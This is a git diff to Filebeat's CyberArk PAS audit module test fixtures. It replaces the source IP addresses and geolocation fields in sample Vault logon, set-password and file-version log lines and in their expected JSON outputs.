@@ -244,11 +233,11 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:58Z", "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT", "cyberarkpas.audit.message": "Create File Version", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.14\n \n \n \n \n \n Create File Version\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMPLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 08:59:58", "event.action": "create file version", "event.code": "62", 
@@ -261,26 +250,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4100, + "log.offset": 4096, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -314,7 +300,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5652, + "log.offset": 5646, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", 
@@ -340,11 +326,11 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:27Z", "cyberarkpas.audit.issuer": "PSMPApp_SSH", "cyberarkpas.audit.message": "Create File Version", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 81.2.69.143\n \n \n \n \n \n Create File Version\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMPLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 05:57:27", "event.action": "create file version", "event.code": "62", 
@@ -357,23 +343,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 7298, + "log.offset": 7292, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.71.250.247", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "34.71.250.247", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log index 82be0d698c1a..2508715a8944 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log 
@@ -5,8 +5,8 @@ <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"216.160.83.61","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json index 31636b9a4f03..0c13f19d19a7 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json @@ -366,7 +366,7 @@ "cyberarkpas.audit.message": "Logon", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 09 00:32:51", "destination.address": "10.0.1.20", "destination.ip": "10.0.1.20", @@ -397,22 +397,19 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -429,7 +426,7 @@ "cyberarkpas.audit.message": "Logon", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "37.223.7.45", + "cyberarkpas.audit.station": "216.160.83.61", "cyberarkpas.audit.timestamp": "Mar 09 02:14:58", "destination.address": "10.0.1.20", "destination.ip": "10.0.1.20", @@ -451,7 +448,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4908, + "log.offset": 4907, "log.syslog.priority": "5", "network.direction": "inbound", "observer.hostname": "VAULT", @@ -460,22 +457,22 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "37.223.7.45" + "216.160.83.61" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "37.223.7.45", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "37.223.7.45", + "source.address": "216.160.83.61", + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "tags": [ "cyberarkpas.audit", "forwarded" @@ -491,7 +488,7 @@ "cyberarkpas.audit.message": "Logon", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:48", "event.action": "authentication_success", "event.category": [ 
@@ -511,29 +508,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5456, + "log.offset": 5457, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMP_ADB_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -549,7 +543,7 @@ "cyberarkpas.audit.message": "Logon", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:48", "event.action": "authentication_success", "event.category": [ 
@@ -576,22 +570,19 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMPApp_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -607,7 +598,7 @@ "cyberarkpas.audit.message": "Logon", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:49", "event.action": "authentication_success", "event.category": [ 
@@ -627,29 +618,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6571, + "log.offset": 6570, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMPGW_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log index 308e66ee8c0c..8cd028024f4a 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log 
@@ -3,16 +3,16 @@ Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n 
\n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 